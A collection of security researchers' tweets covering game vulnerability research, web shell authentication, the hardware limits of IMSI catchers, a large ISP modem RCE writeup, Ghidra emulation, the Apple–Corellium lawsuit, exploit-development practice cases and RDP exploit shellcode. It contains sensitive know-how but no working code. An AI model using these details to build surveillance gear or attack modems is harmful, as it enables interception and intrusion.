The PDF with all the security vulnerabilities I found in multiplayer games when I was an independent researcher from 2001 to 2012:
https://t.co/8KicbSyzP6
@benkow_ It's very normal for web shells to have some sort of protection, i.e. require authentication. If you do some statistical analysis you can probably find out what type of "threat actor" commonly uses this specific authentication method.
@b0rk @rival_elf Furthermore, there are several other limitations you need to take care of for a real IMSI catcher to work, unless you buy the really expensive ones or implement one yourself (i.e. way beyond common guides, as 4G has mutual authentication between the client and the network).
@b0rk @rival_elf The $30 "IMSI catcher", which can only passively sniff data from existing cell towers, and only up to around 10 channels reliably, does not capture all IMSIs in range either if you just turn it on and sniff, as it relies on location updates and certain other types of network events.
@b0rk @rival_elf The $30 "IMSI catcher" is passive (i.e. relies on existing cell towers and how GSM works) and is not a cell tower / BTS.
A real IMSI catcher, which is active, costs at least $300, as you need a capable software-defined radio that can transmit full duplex (i.e. HackRF won't work).
For non-native readers, this is a writeup of my DEVCORE Conference 2019 talk. It describes a misconfiguration that exposed a magic service on port 3097 on our country's largest ISP, and how we found RCE on it to affect more than 250,000 modems :P https://t.co/3S1P6YZfir
Reverse Engineering & Code Emulation with Ghidra: https://t.co/bk3B6J9WVL (Slides)
Repo: A PCode Emulator for Ghidra: https://t.co/28Rx2Iro48 cc @kc0bfv
Apple vs. Corellium
Unredacted version of Corellium’s legal answer is public https://t.co/JXoyk6yI8F
This entire lawsuit is an obvious attempt to decrease the value of Corellium to either
1) own them, or
2) put them out of business to prevent researchers from finding bugs
OffSec is hiring! We're looking for tech and training admins, a project editor, and a cyber security & policy engineer. These positions are remote. View the job descriptions on our Careers page: https://t.co/VjKCR1Ct7f
#techjobs #cybersecurityjobs
Reminder: Call for Papers for Black Hat Europe 2019 is now open. If you’d like an opportunity to present your research in London in December, get your submission in before August 19. #BHEU
Instead of going through a large codebase, sometimes I like to casually write some vulnerable C/C++ cases to play with. Uploaded some to GitHub, hope this is fun for anybody interested in exploit dev: https://t.co/uTp2UKJry3
I have reverse-engineered Qualcomm's Linux kernel interfaces and the DIAG protocol to enable verbose logging of things such as physics variables from the radio interface, RTOS complaints, and OTA signals with PLMN from the baseband; a big deal for this crazy black box.
Previous low-q analyses of the RDP bug suggest that the real reason why some AV vendors jumped in first with an exploit demo is they caught the exploit in a honeypot, and repurposed shellcode to pop calc (which is trivial, as in copy-paste)
Note: I used to work at an AV vendor